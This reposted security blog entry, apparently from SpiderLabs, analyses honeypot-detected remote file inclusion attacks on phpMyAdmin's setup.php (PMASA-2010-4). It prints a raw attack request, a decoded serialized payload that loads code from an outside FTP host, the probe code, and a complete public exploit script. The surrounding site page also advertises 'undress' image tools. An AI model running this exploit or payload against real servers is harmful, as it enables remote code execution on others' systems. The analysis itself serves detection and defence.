搜索
首页php教程php手册PhpMyAdmin setup.php RFI Attacks Detected

SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks. I was looking in our centralModSecurity AuditConsole logging host today and I noticed

SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks.  I was looking in our central ModSecurity AuditConsole logging host today and I noticed a spike in traffic from some Russian IPs that were scanning for the PMASA-2010-4 vulnerability in the PhpMyAdmin setup.php script.

PhpMyAdmin setup.php RFI Attacks Detected

Let's look at the raw ModSecurity audit log data of the inbound request:

--4064df0e-A--
[10/Apr/2012:18:05:55 +0000] T4R2gwowybkAAHp9G@sAAAAF 212.24.61.167 38767 XXX.XXX.XXX.XXX 80
--4064df0e-B--
POST /pma/scripts/setup.php HTTP/1.1
Connection: close
Host: 176.34.207.219
Referer: 176.34.207.219
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

--4064df0e-C--
action=lay_navigation&eoltype=unix&token=&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22ftp%3A%2F%2Fthewinecompany%3AgXNbUEwfLa%4046%2E32%2E228%2E222%2F%2Ea%2Fid%2Etxt%22%3B%7D%7D

If we URL decode the request body data, we get this:

action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:
{<span><strong>s:6:"source";s:55:"ftp://thewinecompany:gXNbUEwfLa@46.32.228.222/.a/id.txt"</strong></span>;}}

As you can see, the attacker is attempting overwrite the PhpMyAdmin configuration file by instructing it to use FTP to download and run the "id.txt" file on a remote site.  The contents of the id.txt file is PHP code:

<?php print(base64_decode("c3Q0cjc="));
echo(php_uname());
print(base64_decode("ZjFuMTVo"));
die;
?>

Looking at what this file is doing, it appears to be a simple probe to identify if the target web application is vulnerable to this type of RFI attack.  If the application responds with the output from these PHP commands, then the attacker will proceed with other attacks.  SpiderLabs Research was able to find the following script in public forums that launch similar attacks:

/* wtf zmeu was here haha,yeah me... found this sh*t bug on pmasux */
$arguments = getopt("a:b:c");

$pma_setup_url = $arguments[a];
//echo $arguments[a];
$ftp_code = 'ftp://devil:devil@85.10.138.51/c.txt';

//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = '')
{
$return = '';
$feof_count = 0;
$parsed_url = parse_url($url);
$site = $parsed_url;
$path = $parsed_url;
$query = $parsed_url;

($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';
($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';

$fp = fsockopen($site, 80, $errno, $errstr, 30);
($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: $ua_string\r\n";
$out .= "Referer: $referer_string\r\n";
$out .= "Cookie: $cookie_string\r\n";
($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);

while (!feof($fp))
{
if($feof_count >=200)
break;

$return .= fread($fp, 4800);
++$feof_count;
}

fclose($fp);
return $return;
}

$token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,'','Opera');

preg_match('@name="token" value="(a-f0-9{32})"@is',$token_page,$token_array);

$token = $token_array[1];

preg_match_all('@Set-Cookie: (<span>^\r\n;</span>+)@is',$token_page,$cookie_array);

$cookie_array = $cookie_array[1];
$cookie_array = implode("; ",$cookie_array);

print
send_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');

 This issue was patched in the php source code with the following update:

PhpMyAdmin setup.php RFI Attacks Detected
By filtering out non-word characters, it would prevent the attacker from injecting the RFI code.

声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
phpmyadmin怎么设置主键phpmyadmin怎么设置主键Apr 07, 2024 pm 02:54 PM

表的主键是一列或多列,用于唯一标识表中每条记录。设置主键的步骤如下:登录 phpMyAdmin。选择数据库和表。勾选要作为主键的列。点击 "保存更改"。主键具有数据完整性、查找速度和关系建模方面的好处。

phpmyadmin怎么添加外键phpmyadmin怎么添加外键Apr 07, 2024 pm 02:36 PM

在 phpMyAdmin 中添加外键可以通过以下步骤实现:选择包含外键的父表。编辑父表结构,在“列”中添加新列。启用外键约束,选择引用表和键。设置更新/删除操作。保存更改。

phpmyadmin账号密码是什么phpmyadmin账号密码是什么Apr 07, 2024 pm 01:09 PM

PHPMyAdmin 的默认用户名和密码为 root 和空。为了安全起见,建议更改默认密码。更改密码的方法:1. 登录 PHPMyAdmin;2. 选择 "privileges";3. 输入新密码并保存。忘记密码时,可通过停止 MySQL 服务并编辑配置文件的方式重置密码:1. 添加 skip-grant-tables 行;2. 登录 MySQL 命令行并重置 root 密码;3. 刷新权限表;4. 删除 skip-grant-tables 行,重启 MySQL 服务。

phpmyadmin怎么删除数据表phpmyadmin怎么删除数据表Apr 07, 2024 pm 03:00 PM

phpMyAdmin 中删除数据表的步骤:选择数据库和数据表;点击“操作”选项卡;选择“删除”选项;确认并执行删除操作。

phpmyadmin日志在哪里phpmyadmin日志在哪里Apr 07, 2024 pm 12:57 PM

PHPMyAdmin日志文件的默认位置:Linux/Unix/macOS:/var/log/phpmyadminWindows:C:\xampp\phpMyAdmin\logs\日志文件用途:故障排除审计安全性

为什么phpmyadmin拒绝访问为什么phpmyadmin拒绝访问Apr 07, 2024 pm 01:03 PM

phpMyAdmin 拒绝访问的原因及解决方案:认证失败:检查用户名和密码是否正确。服务器配置错误:调整防火墙设置,检查数据库端口是否正确。权限问题:授予用户对数据库的访问权限。会话超时:刷新浏览器页面重新连接。phpMyAdmin 配置错误:检查配置文件和文件权限,确保启用了必需的 Apache 模块。服务器问题:等待一段时间后再重试或联系主机提供商。

phpmyadmin关联视图在哪phpmyadmin关联视图在哪Apr 07, 2024 pm 01:00 PM

可以在 phpMyAdmin 中“结构”选项卡下的“视图”子菜单中找到关联视图。要访问它们,只需选择数据库、点击“结构”选项卡、然后点击“视图”子菜单。

phpmyadmin漏洞属于什么漏洞phpmyadmin漏洞属于什么漏洞Apr 07, 2024 pm 01:36 PM

phpMyAdmin 易受多种漏洞影响,包括:1. SQL 注入漏洞;2. 跨站点脚本 (XSS) 漏洞;3. 远程代码执行 (RCE) 漏洞;4. 本地文件包含 (LFI) 漏洞;5. 信息泄露漏洞;6. 权限提升漏洞。

See all articles

热AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智能驱动的应用程序,用于创建逼真的裸体照片

AI Clothes Remover

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

Undress AI Tool

免费脱衣服图片

Clothoff.io

Clothoff.io

AI脱衣机

AI Hentai Generator

AI Hentai Generator

免费生成ai无尽的。

热门文章

R.E.P.O.能量晶体解释及其做什么(黄色晶体)
2 周前By尊渡假赌尊渡假赌尊渡假赌
仓库:如何复兴队友
4 周前By尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island冒险:如何获得巨型种子
3 周前By尊渡假赌尊渡假赌尊渡假赌

热工具

Dreamweaver CS6

Dreamweaver CS6

视觉化网页开发工具

禅工作室 13.0.1

禅工作室 13.0.1

功能强大的PHP集成开发环境

适用于 Eclipse 的 SAP NetWeaver 服务器适配器

适用于 Eclipse 的 SAP NetWeaver 服务器适配器

将Eclipse与SAP NetWeaver应用服务器集成。

mPDF

mPDF

mPDF是一个PHP库,可以从UTF-8编码的HTML生成PDF文件。原作者Ian Back编写mPDF以从他的网站上“即时”输出PDF文件,并处理不同的语言。与原始脚本如HTML2FPDF相比,它的速度较慢,并且在使用Unicode字体时生成的文件较大,但支持CSS样式等,并进行了大量增强。支持几乎所有语言,包括RTL(阿拉伯语和希伯来语)和CJK(中日韩)。支持嵌套的块级元素(如P、DIV),

Atom编辑器mac版下载

Atom编辑器mac版下载

最流行的的开源编辑器